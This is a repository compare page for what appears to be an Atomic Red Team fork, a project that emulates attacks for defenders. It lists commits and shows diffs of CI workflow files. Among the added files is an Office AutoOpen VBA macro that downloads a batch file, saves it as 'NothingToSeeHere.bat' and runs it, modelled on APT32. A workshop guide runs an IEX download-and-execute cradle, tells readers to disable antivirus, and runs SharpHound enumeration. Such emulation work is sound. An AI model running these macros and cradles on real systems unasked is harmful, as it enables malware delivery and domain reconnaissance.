security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: security-tools/atomic-red-team:T1016_fix
Branches Tags
security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093
..
pull from: security-tools/atomic-red-team:oscd
Branches Tags
security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093

47 Commits
T1016_fix .. oscd

Author SHA1 Message Date
CircleCI Atomic Red Team doc generator f427e2c338 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-11-23 13:41:01 +00:00
Matt Graeber 3610e65375 Merge pull request #1240 from remotephone/oscdt1016 
[OSCD] Test for T1016 - macOS firewall enumeration
 2020-11-23 08:40:31 -05:00
CircleCI Atomic Red Team doc generator 3a001ee8f9 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-11-23 13:40:04 +00:00
Matt Graeber 5f34ccd556 Merge pull request #1267 from oscd-initiative/oscd_sigma_sync 
[OSCD] split Linux and macOS tests for T1518.001; update processes list
 2020-11-23 08:39:33 -05:00
CircleCI Atomic Red Team doc generator 795ce8f499 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-11-12 18:22:28 +00:00
OG c4535c64dc [OSCD] Adding T1547.010 (#1264) 
* Port monitor addition

* Rename T1547.010.yml to T1547.010.yaml
 2020-11-12 11:22:04 -07:00
yugoslavskiy 60d73a2780 Update T1518.001.yaml 2020-10-30 06:56:20 +01:00
CircleCI Atomic Red Team doc generator cb5079f516 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-30 04:50:15 +00:00
Keith McCammon e0a61be952 Merge branch 'master' into oscd 2020-10-29 22:49:50 -06:00
CircleCI Atomic Red Team doc generator c570863162 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-30 04:44:05 +00:00
Keith McCammon 0b55c53c83 Grr 2020-10-29 22:43:10 -06:00
Keith McCammon 0a509412dd Remove index files to avoid CI complaints. 2020-10-29 22:23:49 -06:00
CircleCI Atomic Red Team doc generator b99407210d Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-26 04:16:29 +00:00
Carl f0b2cad95a Merge pull request #1268 from aw350m33d/ISS_1219 
[OSCD] Added T1562.006 tests to emulate indicator blocking on Linux
 2020-10-25 22:15:56 -06:00
CircleCI Atomic Red Team doc generator 1114a1d32e Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-26 04:13:24 +00:00
Carl d630fdfc2d Merge pull request #1263 from oscd-initiative/oscd_updates 
[OSCD] updated a few tests
 2020-10-25 22:12:59 -06:00
CircleCI Atomic Red Team doc generator eccacb66b4 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-26 04:12:11 +00:00
Carl 00f9e63a1c Merge pull request #1262 from oscd-initiative/oscd 
[OSCD] Update T1564.002: Hidden User Creation test for macOS
 2020-10-25 22:11:41 -06:00
CircleCI Atomic Red Team doc generator 83ebbf049d Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-24 14:23:47 +00:00
omkargudhate22 e0495296ac [OSCD] Office persiststence : Office test (#1266) 
* Office persiststence :  Office test

* Added technique details
 2020-10-24 08:23:13 -06:00
CircleCI Atomic Red Team doc generator 8e3abf4620 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-21 16:52:26 +00:00
omkargudhate22 d3873c48a4 Indirect command execution - conhost (#1265) 2020-10-21 10:51:54 -06:00
aw350m3 347457a693 Removed prereq and fixed command endings 2020-10-20 08:48:23 +00:00
yugoslavskiy 618c150a94 Update T1518.001.yaml 2020-10-20 05:31:30 +02:00
Yugoslavskiy Daniil 2db46f3ca3 split linux and macos tests for TT1518.001; update processes list 2020-10-20 05:26:38 +02:00
aw350m3 5fb2ebf442 Added T1562.006 tests to emulate indicator blocking by modifying configuration files 2020-10-19 22:05:18 +00:00
Yugoslavskiy Daniil 30d8defed6 add Gatekeeper disable; add cleanup for security tools disable; add another launchagent for carbon black defense; remove Gatekeeper disable command from Gatekeeper bypass technique 2020-10-18 02:04:01 +02:00
Yugoslavskiy Daniil 23b1ad6331 update T1564.002 2020-10-18 01:23:05 +02:00
Yugoslavskiy Daniil d381056952 update T1564.002 2020-10-18 01:19:25 +02:00
CircleCI Atomic Red Team doc generator ce8e4dcf80 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:59:46 +00:00
sn0w0tter 761eb9cc72 [OSCD] Create atomic test for T1113 for Windows (#1251) 2020-10-15 10:59:14 -06:00
CircleCI Atomic Red Team doc generator 72e6640db6 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:51:45 +00:00
mrblacyk f9637403eb T1136.002 - 2 tests added (#1252) 2020-10-15 10:51:21 -06:00
CircleCI Atomic Red Team doc generator c51438c486 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:42:07 +00:00
mrblacyk dd48a41960 [OSCD] T1036.004: Masquerade Task or Service - 2 tests (#1253) 
* T1036.004 - 2 tests added

* Update T1036.004.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2020-10-15 10:41:21 -06:00
CircleCI Atomic Red Team doc generator d5ef015f53 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:36:33 +00:00
gregclermont 8e322ecb76 Add test for T1006 Direct Volume Access (#1254) 2020-10-15 10:36:07 -06:00
CircleCI Atomic Red Team doc generator c783bcc9db Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-09 19:49:36 +00:00
Carl d5e35e5094 Merge pull request #1246 from haresudhan/T1497.001 
[OSCD] Tests added for T1497.001
 2020-10-09 13:49:11 -06:00
haresudhan 20e73bc883 Merge branch 'T1497.001' of github.com:haresudhan/atomic-red-team into T1497.001 2020-10-09 11:56:16 -06:00
haresudhan 8f5640a24e Changing to device manufacturer based test 2020-10-09 11:56:00 -06:00
remotephone@gmail.com fff4ea260b adding socketfilterfw and cleaning up description formatting, adding description details 2020-10-09 00:20:40 -05:00
CircleCI Atomic Red Team doc generator 06e9a0c56b Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-08 17:52:19 +00:00
gregclermont efead2314d Add tests for T1134.001 Access Token Impersonation/Theft (#1236) 2020-10-08 11:51:28 -06:00
Carrie Roberts d17b6dd56e standardize display name 2020-10-08 10:47:41 -06:00
haresudhan 224bdc0d55 Tests added 2020-10-08 09:11:14 -06:00
remotephone@gmail.com 8281a56f15 Updating T1016 to include macos firewall enumeration 2020-10-06 23:39:21 -05:00
1255 changed files with 301386 additions and 1770236 deletions
Expand all files Collapse all files
.circleci/config.yml
+56
View File
@@ -0,0 +1,56 @@
version: 2
defaults: &defaults
docker:
- image: circleci/ruby:2.4
workflows:
version: 2
validate-then-generate-docs:
jobs:
- validate_atomics_generate_docs
jobs:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Generate unique GUIDs for each atomic test
command: |
bin/generate-guids.rb
- run:
name: Validate the format of atomic tests against the spec
command: |
bin/validate-atomics.rb
- run:
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
.devcontainer/devcontainer.json
-26
View File
@@ -1,26 +0,0 @@
{
"image": "mcr.microsoft.com/devcontainers/universal:2",
"features": {
"ghcr.io/devcontainers/features/powershell:1": {},
"ghcr.io/natescherer/devcontainers-custom-features/powershell-resources:1": {
"resources": "powershell-yaml,invoke-atomicredteam"
}
},
"remoteUser": "root",
"onCreateCommand": "pwsh /workspaces/atomic-red-team/.devcontainer/setup.ps1",
"customizations": {
"vscode": {
"extensions": [
"ms-vscode.powershell"
],
"settings": {
"terminal.integrated.defaultProfile.linux": "pwsh",
"terminal.integrated.profiles.linux": {
"pwsh": {
"path": "/usr/bin/pwsh"
}
}
}
}
}
}
.devcontainer/setup.ps1
-7
View File
@@ -1,7 +0,0 @@
New-Item $PROFILE -Force
Set-Variable -Name "InvokePath" -Value (Get-Item /usr/local/share/powershell/Modules/Invoke-AtomicRedTeam/**/Invoke-AtomicRedTeam.psd1).FullName
Write-Output @"
Import-Module $InvokePath -Force
`$PSDefaultParameterValues`["Invoke-AtomicTest:PathToAtomicsFolder"] = "/workspaces/atomic-red-team/atomics";
`$PSDefaultParameterValues`["Invoke-AtomicTest:ExecutionLogPath"]="$HOME/AtomicRedTeam/execution.csv";
"@ > $PROFILE
.github/dependabot.yml
-16
View File
@@ -1,16 +0,0 @@
# To get started with Dependabot version updates, you'll need to specify which
# package ecosystems to update and where the package manifests are located.
# Please see the documentation for all configuration options:
# https://docs.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
version: 2
updates:
- package-ecosystem: "pip" # See documentation for possible values
directory: "/" # Location of package manifests
schedule:
interval: "weekly"
# Maintain dependencies for GitHub Actions
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
.github/workflows/assign-labels.yml
-59
View File
@@ -1,59 +0,0 @@
name: assign-labels
on:
workflow_run:
workflows: ["validate-atomics"]
types:
- completed
jobs:
assign-labels:
runs-on: ubuntu-latest
steps:
- name: download-artifact
uses: actions/github-script@v7
with:
script: |
let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
repo: context.repo.repo,
run_id: context.payload.workflow_run.id,
});
let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
return artifact.name == "labels.json"
})[0];
let download = await github.rest.actions.downloadArtifact({
owner: context.repo.owner,
repo: context.repo.repo,
artifact_id: matchArtifact.id,
archive_format: 'zip',
});
let fs = require('fs');
fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));
- name: unzip-artifact
run: unzip labels.zip
- name: assign-labels-and-reviewers
uses: actions/github-script@v7
with:
script: |
let fs = require('fs');
const obj = JSON.parse(fs.readFileSync('./labels.json'));
console.log(obj)
if(obj.labels.length > 0){
await github.rest.issues.addLabels({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
labels: obj.labels
})
}
if(obj.maintainers.length > 0){
await github.rest.issues.addAssignees({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
assignees: obj.maintainers
});
}
.github/workflows/generate-docs.yml
-69
View File
@@ -1,69 +0,0 @@
name: generate-docs
on:
push:
branches: [ "master" ]
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v4
with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
- name: Install poetry
run: pipx install poetry
- uses: actions/setup-python@v5
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: Generate shields.io URL
run: poetry run python runner.py generate-counter
id: counter
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- name: Update README
run: |
echo ${{ steps.counter.outputs.result }}
sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
shell: bash
- name: Generate and commit unique GUIDs for each atomic test
run: poetry run python runner.py generate-guids
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 3.0
bundler-cache: true
- name: generate markdown docs for atomics
run: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team doc generator"
git add README.md
git add atomics
git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
git push origin $GITHUB_REF_NAME -f
fi
.github/workflows/run-python-tests.yml
-29
View File
@@ -1,29 +0,0 @@
name: validate-python-file-changes
on:
pull_request:
branches:
- master
paths:
- "atomic_red_team/**/*.py"
jobs:
validate-python-file-changes:
runs-on: macos-latest
steps:
- name: checkout repo
uses: actions/checkout@v4
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v5
id: setup-python
with:
python-version: "3.12.4"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: Run pytest
run: poetry run pytest atomic_red_team/tests
.github/workflows/stale.yml
-19
View File
@@ -1,19 +0,0 @@
name: 'Close stale issues and PRs'
on:
schedule:
- cron: '30 1 * * *'
jobs:
stale:
runs-on: ubuntu-latest
steps:
- uses: actions/stale@v9
with:
stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
days-before-issue-stale: 30
days-before-pr-stale: 45
days-before-issue-close: 10
days-before-pr-close: 10
.github/workflows/validate-atomics.yml
-75
View File
@@ -1,75 +0,0 @@
name: validate-atomics
on:
pull_request:
branches:
- master
jobs:
validate-atomics:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v4
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v5
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: validate the format of atomics tests against the spec
run: poetry run python runner.py validate
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
upload:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v4
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v5
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- uses: actions/github-script@v7
id: get_pr_number
with:
script: |
if (context.issue.number) {
// Return issue number if present
return context.issue.number;
} else {
// Otherwise return issue number from commit
return (
await github.rest.repos.listPullRequestsAssociatedWithCommit({
commit_sha: context.sha,
owner: context.repo.owner,
repo: context.repo.repo,
})
).data[0].number;
}
result-encoding: string
- name: Install dependencies
run: poetry install --no-interaction --no-root
- name: save labels and reviewers into a file.
run: |
poetry run python runner.py generate-labels --pr '${{steps.get_pr_number.outputs.result}}' --token ${{ secrets.GITHUB_TOKEN }}
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- uses: actions/upload-artifact@v4
with:
name: labels.json
path: atomic_red_team/pr/
.github/workflows/validate-terraform.yml
-20
View File
@@ -1,20 +0,0 @@
name: validate-terraform
on:
pull_request:
branches:
- master
paths:
- "**/*.tf"
jobs:
validate-terraform:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: hashicorp/setup-terraform@v3
- name: Terraform fmt
id: fmt
run: terraform fmt -recursive -check
continue-on-error: false
.gitignore
-126
View File
@@ -24,129 +24,3 @@ docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
# Local .terraform directories
**/.terraform/*
# .tfstate files
*.tfstate
*.tfstate.*
**/*.terraform.lock.hcl
# Crash log files
crash.log
crash.*.log
# Ignore override files as they are usually used to override resources locally and so
# are not checked in
override.tf
override.tf.json
*_override.tf
*_override.tf.json
# Include override files you do wish to add to version control using negated pattern
# !example_override.tf
# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
# example: *tfplan*
# Ignore CLI configuration files
.terraformrc
terraform.rc
*.pyc
# The ExternalPayloads folder
ExternalPayloads
# Visual Studio 2015/2017 cache/options directory
.vs/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# ASP.NET Scaffolding
ScaffoldingReadMe.txt
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.tlog
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Node.js
node_modules/
# Python
__pycache__/
*.pyc
.hypothesis/
ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba
+48
View File
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
ARTifacts/Adversary/Dragons_Tail/README.md
+2
View File
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
ARTifacts/Atomic_Friday/2020-05-01/Atomic_Friday.md
Executable
+155
View File
@@ -0,0 +1,155 @@
# Atomic Friday - 05-01-2020
## Setup
My environment today is built with DetectionLab.
>This lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.
Get it here:
https://github.com/clong/DetectionLab
Follow: [@DetectionLab](https://twitter.com/DetectionLab)
<img src="https://github.com/clong/DetectionLab/raw/master/img/DetectionLab.png" alt="DetectionLab" width="200"/>
We will be working from WIN10 system.
`$PSVersionTable`
```
Name Value
---- -----
PSVersion 5.1.18362.1
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.18362.1
CLRVersion 4.0.30319.42000
...
```
## Get Invoke-AtomicRedTeam
<img src="https://www.redcanary.com/wp-content/uploads/image2-25.png" alt="Atomic" width="200"/>
https://github.com/redcanaryco/invoke-atomicredteam
```
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1')
Install-AtomicRedTeam -getAtomics
```
This will install `invoke-atomicredteam` and download `Atomics` folder from Atomic Red Team.
Note:
- `Set-ExecutionPolicy -Scope CurrentUser unrestricted`
- `set-executionpolicy unrestricted`
- Disable AV.
Atomics folder:
https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
## Before Update
We're going to modify T1086 - BloodHound
https://github.com/redcanaryco/atomic-red-team/tree/23620c707ac1ed89e4207a39488f9214cf3c6e1e/atomics/T1086
## After Update
SharpHound PR
- https://github.com/redcanaryco/atomic-red-team/pull/955
- https://github.com/redcanaryco/atomic-red-team/pull/962
- Added src dir (removed payloads)
- Added input arguments
- Added prereqs
SharpHound ingestor:
https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
## Local Execution
`Invoke-AtomicTest T1086 -ShowDetailsBrief`
```
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
T1086-1 Mimikatz
T1086-2 Run BloodHound from local disk
T1086-3 Run Bloodhound from Memory using Download Cradle
```
Select test and show details:
`Invoke-AtomicTest T1086 -TestNumbers 2 -ShowDetails`
Check Prerequisits:
`Invoke-AtomicTest T1086 -TestNumbers 2 -CheckPrereqs`
```
CheckPrereq's for: T1086-2 Run BloodHound from local disk
Prerequisites not met: T1086-2 Run BloodHound from local disk
[*] SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
Try installing prereq's with the -GetPrereqs switch
```
Get Prerequisits:
`Invoke-AtomicTest T1086 -TestNumbers 2 -GetPrereqs`
```
GetPrereq's for: T1086-2 Run BloodHound from local disk
Attempting to satisfy prereq: SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
Prereq successfully met: SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
```
Execute:
`Invoke-AtomicTest T1086 -TestNumbers 2`
```
Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1086\src
-----------------------------------------------
Initializing SharpHound at 4:31 PM on 4/30/2020
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain WINDOMAIN.LOCAL using path CN=Schema,CN=Configuration,DC=WINDOMAIN,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 81 MB RAM
Status: 71 objects finished (+71 ∞)/s -- Using 86 MB RAM
Enumeration finished in 00:00:00.6317770
Compressing data to C:\Users\VAGRAN~1.WIN\AppData\Local\Temp\20200430163109_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 4:31 PM on 4/30/2020! Happy Graphing!
Done executing test: T1086-2 Run BloodHound from local disk
```
Where are my reports!?
`-OutputDirectory $env:Temp`
`ls $env:Temp`
`20200430163109_BloodHound.zip`
Time to cleanup
`Invoke-AtomicTest T1086 -TestNumbers 2 -Cleanup`
```
Command (with inputs):
Remove-Item C:\AtomicRedTeam\atomics\T1086\src\SharpHound.ps1 -Force -ErrorAction Ignore
Remove-Item $env:Temp\*BloodHound.zip -Force
```
ARTifacts/Atomic_Friday/2020-05-01/BuildAtomicTest_ps1
+56
View File
@@ -0,0 +1,56 @@
Import-Module /Users/matt.graeber/Documents/GitHub/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1
# Explore the functions exposed in invoke-atomicredteam
Get-Command -Module Invoke-AtomicRedTeam
# Path to the
$AtomicPath = '/Users/matt.graeber/Documents/GitHub/atomic-red-team/atomics/T1086/T1086.yaml'
# Get the raw YAML
$T1086 = Get-Content -Path $AtomicPath -Raw
# Parse the YAML, validate against expected atomic technique/test schema and output appropriate PowerShell object.
$AtomicTechnique = Get-AtomicTechnique -Path $AtomicPath
# Validate all atomics
Get-ChildItem -Path /Users/matt.graeber/Documents/GitHub/atomic-red-team/atomics/ -Recurse -Include 'T*.yaml' | Get-AtomicTechnique
# Recreate T1086 test #2
$InputArg1 = New-AtomicTestInputArgument -Name internal_domain -Description 'Specify internal domain name to analyze' -Type String -Default 'windomain.local'
$InputArg2 = New-AtomicTestInputArgument -Name file_path -Description 'File path for SharpHound payload' -Type String -Default 'PathToAtomicsFolder\T1086\src'
$DependencyArgs = @{
Description = 'Validate if SharpHound.ps1 is located in #{file_path}.'
PrereqCommand = 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}'
GetPrereqCommand = 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"'
}
$Dependency = New-AtomicTestDependency @DependencyArgs
$TestArgs = @{
Name = 'Run BloodHound from local disk'
Description = @'
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
'@
SupportedPlatforms = 'Windows'
ExecutorType = 'PowerShell'
ExecutorCommand = @'
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain -OutputDirectory #{output_path}
'@
ExecutorCleanupCommand = @'
Remove-Item #{file_path}\SharpHound.ps1 -Force
Remove-Item #{file_path}\*BloodHound.zip -Force
'@
InputArguments = $InputArg1, $InputArg2
DependencyExecutorType = 'PowerShell'
Dependencies = $Dependency
}
$AtomicTest = New-AtomicTest @TestArgs
# Convert the atomic test to raw YAML. Add to existing technique. Profit
$AtomicTest | ConvertTo-Yaml
